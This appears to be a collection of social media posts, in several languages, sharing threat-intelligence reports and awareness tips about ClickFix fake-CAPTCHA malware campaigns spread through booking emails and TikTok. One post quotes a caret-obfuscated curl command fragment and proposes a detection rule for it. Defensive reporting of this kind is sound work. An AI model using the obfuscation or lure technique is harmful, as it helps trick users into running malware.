🚨 New malware alert: Mocha Manakin uses #Clickfix (fakeCAPTCHA) to trick users into deploying a custom backdoor called NodeInitRAT. Red Canary warns it could lead to ransomware!
🔗 https://hackread.com/mocha-manakin-malware-nodeinitrat-via-clickfix-attack
#CyberSecurity #CyberAttack #fakeCAPTCHA #MochaManakin #NodeInitRAT
2025-06-18 (Wednesday): #SmartApeSG --> #ClickFix lure --> #NetSupportRAT --> #StealCv2
A #pcap of the traffic, the malware/artifacts, and some IOCs are available at https://www.malware-traffic-analysis.net/2025/06/18/index.html.
Today's the 12th anniversary of my first blog post on malware-traffic-analysis.net, so I made this post a bit more old school.
"Famous Chollima deploying Python version of GolangGhost RAT" published by CiscoTalos. #ClickFix, #FamousChollima, #PylangGhost, #DPRK, #CTI https://blog.talosintelligence.com/python-version-of-golangghost-rat/
📢 Campagne de malware utilisant ClickFix pour déployer ARECHCLIENT2
📝 Elastic Security Labs a détecté une augmentation des campagnes utilisant la technique **ClickFix**, une méthode d'ingénierie sociale qui incite les utilisateurs à exécuter du code mal...
📖 cyberveille : https://cyberveille.ch/posts/2025-06-18-campagne-de-malware-utilisant-clickfix-pour-deployer-arechclient2/
🌐 source : https://www.elastic.co/security-labs/a-wretch-client
#ARECHCLIENT2 #ClickFix #Cyberveille
ClickFix とは?──世界で急増する新手のソーシャルエンジニアリング攻撃まとめ
https://qiita.com/yousukezan/items/7b593ac04597cf72ffc5?utm_campaign=popular_items&utm_medium=feed&utm_source=popular_items
🚨 Researchers warn of a surge in #ClickFix scams impersonating #Booking.com. Fake CAPTCHAs trick users into running malware like XWorm and DanaBot.
Read: https://hackread.com/clickfix-email-scam-fake-booking-com-emails-malware/
Ran into a ClickFix incident where the commands were obfuscated like: "c^u^rl.e^x^e
Probably worth flagging on Commands that contain excessive carrots and have a parent process of explorer.exe or conhost.exe
☀️ Summer is Here and So Are Fake Bookings 🎣
🚨 #Phishing emails disguised as #booking confirmations are heating up during this summer travel season, using #ClickFix techniques to deliver #malware.
Fake http://Booking.com emails typically request payment confirmation or additional service fees, urging victims to interact with malicious payloads.
👨💻 Fake payment form analysis session: https://app.any.run/tasks/84cffd74-ab86-4cd3-9b61-02d2e4756635/?utm_source=mastodon&utm_medium=post&utm_campaign=seasonal_clickfix&utm_content=linktoservice&utm_term=040625
🔍 A quick search in Threat Intelligence Lookup reveals a clear spike in activity during May-June. Use this search request to find related domains, IPs, and sandbox analysis sessions:
https://intelligence.any.run/analysis/lookup?utm_source=mastodon&utm_medium=post&utm_campaign=seasonal_clickfix&utm_content=linktoti&utm_term=040625#%7B%2522query%2522:%2522domainName:%255C%2522booking.%255C%2522%2520AND%2520threatLevel:%255C%2522malicious%255C%2522%2522,%2522dateRange%2522:30%7D%20
Most recent samples use ClickFix, a #fakecaptcha where the victim is tricked into copy-pasting and running a #PowerShell downloader via terminal.
👨💻 ClickFix analysis session: https://app.any.run/tasks/2e5679ef-1b4a-4a45-a364-d183e65b754c/?utm_source=mastodon&utm_medium=post&utm_campaign=seasonal_clickfix&utm_content=linktoservice&utm_term=040625
The downloaded executables belong to the #RAT malware families, giving attackers full remote access to infected systems.
❗️ How to stay safe from seasonal phishing threats during your vacation:
1️⃣ Validate sender domains. Emails from trusted booking providers, hotels, and airlines typically come from official domains such as
@booking
.com,
@airline
.com
2️⃣ Analyze suspicious files with #ANYRUN. Use #ANYRUN’s interactive sandbox to quickly detect threats, safely detonate phishing URLs, and observe malicious behavior in a controlled environment.
3️⃣ Only enter your personal data on trusted websites. Look for a valid HTTPS certificate and double-check that the site belongs to the real service.
4️⃣ Train staff on phishing and brand impersonation tactics, especially during peak travel periods.
🏝️ Have a safe and sweet vacation!
Interlock ransomware: what you need to know - "We don’t just want payment; we want accountability." The malicious hackers behind the I... https://www.tripwire.com/state-of-security/interlock-ransomware-what-you-need-know #ransomware #databreach #guestblog #interlock #clickfix #malware
"We don’t just want payment; we want accountability." The malicious hackers behind the Interlock ransomware try to justify their attacks.
Learn more about what you need to know about Interlock in my article on the Tripwire blog.
https://www.tripwire.com/state-of-security/interlock-ransomware-what-you-need-know
Cảnh báo 4 Hình thức Tấn Công Người Dùng Trên TikTok và Smartphone #ClickFix #AnToanMang #TikTok #BảoMậtĐiệnThoại #CyberSecurity
Cảnh báo 4 Hình thức Tấn Công Người Dùng Trên TikTok và Smartphone #ClickFix #AnToanMang #TikTok #BảoMậtĐiệnThoại #CyberSecurity 1. ClickFix là gì? ClickFix là một kỹ thuật tấn công thuộc loại UI Redressing (đánh lừa giao diện người dùng), trong đó hành động của người dùng bị điều hướng một cách bí mật thông qua việc thao túng các yếu tố hiển…
TikTok staat bekend als platform voor creatieve content maar wordt nu ook gebruikt als lokaas voor cybercriminelen.
Podcast Youtube: https://youtu.be/cPADO5G5kJ0?si=7n-L01IBSzdX67DL
Podcast Spotify: https://open.spotify.com/episode/2ZcrbUvXIOfBpPuaq7VQt7?si=61ccef7960ac43c7
Artikel Cybercrimeinfo: https://www.ccinfo.nl/menu-onderwijs-ontwikkeling/cybercrime/malware/2527960_hoe-tiktok-verandert-in-een-digitale-valstrik-infostealer-malware-via-virale-video-s
#TikTok #malware #cybercrime #ClickFix #infostealer #socialengineering #cybersecurity #digitaleveiligheid #PowerShell #StealC #Vidar #jongerenonline #cyberdreiging #cyberbewustzijn #darkweb #phishing #gratissoftware #cyberaanval #digitalevalstrik
Infostealery rozprzestrzeniają się przez TikTok i technikę ClickFix – szczegóły techniczne kampanii
W ostatnich tygodniach badacze bezpieczeństwa zaobserwowali nietypową, skuteczną kampanię malware, w której cyberprzestępcy wykorzystują popularność TikToka do dystrybucji złośliwego oprogramowania typu infostealer (m.in. Vidar, StealC, Latrodectus). Atak opiera się na tzw. technice ClickFix, polegającej na nakłanianiu użytkowników do samodzielnego uruchamiania złośliwych poleceń PowerShell. Poniżej przedstawiamy szczegółową analizę tej kampanii oraz...
Ich weiß ja nicht, wo ihr euch so herumtreibt, aber das könnte eventuell wichtig sein.
📬 ClickFix-Malware über TikTok: Infostealer im Influencer-Gewand
#ITSicherheit #Malware #ClickFix #Infostealer #MalwareVerbreitung #RedLineStealer #TikTok #VidarMalware https://sc.tarnkappe.info/4922e5
🚨 Malware via TikTok? Believe it.
Hackers are using AI-generated TikTok videos to trick users into running PowerShell commands that drop info-stealers like Vidar and StealC — all through a tactic called ClickFix.
🧠 How it works:
📋 Copy content from the clipboard
⚠️ Paste & run it in PowerShell
💣 Malware executes — silently
This isn’t theoretical. It’s happening now.
As someone who teaches and works in this space — this is the kind of threat that blurs social engineering, platform trust, and user habit.
Stay sharp:
🔒 Train your teams
⚙️ Lock down script execution
🛑 Stop trusting random “fix” videos
#Cybersecurity #TikTokThreat #ClickFix #InfoStealer #SocialEngineering #security #privacy #cloud #infosec
https://thehackernews.com/2025/05/hackers-use-tiktok-videos-to-distribute.html
Another good deep dive into how some of these #ClickFix campaigns work, with #ioc included
From: @VirusBulletin
https://infosec.exchange/@VirusBulletin/114556477032851770
TikTok just got a new menace: AI-generated "tutorials" that trick you into running harmful commands. Could your next how-to video be putting your device at risk? Learn how ClickFix is redefining cyber scams.
https://thedefendopsdiaries.com/unmasking-clickfix-the-new-cyber-threat-on-tiktok/
#clickfix
#tiktoksecurity
#cyberthreats
#malware
#socialengineering
State-sponsored threat actors often leverage techniques first developed and deployed by cybercriminal actors. One example is #ClickFix, a highly effective technique that involves clever #socialengineering.
Listen as Proofpoint threat research experts Selena Larson, Sarah Sabotka, and Saher Naumaan deep dive into how modern #espionage and #cybercrime are increasingly blurring lines.
Stream DISCARDED now:
Apple Podcasts: https://brnw.ch/21wSNbM
Spotify: https://brnw.ch/21wSNbL
Web player: https://brnw.ch/21wSNbN
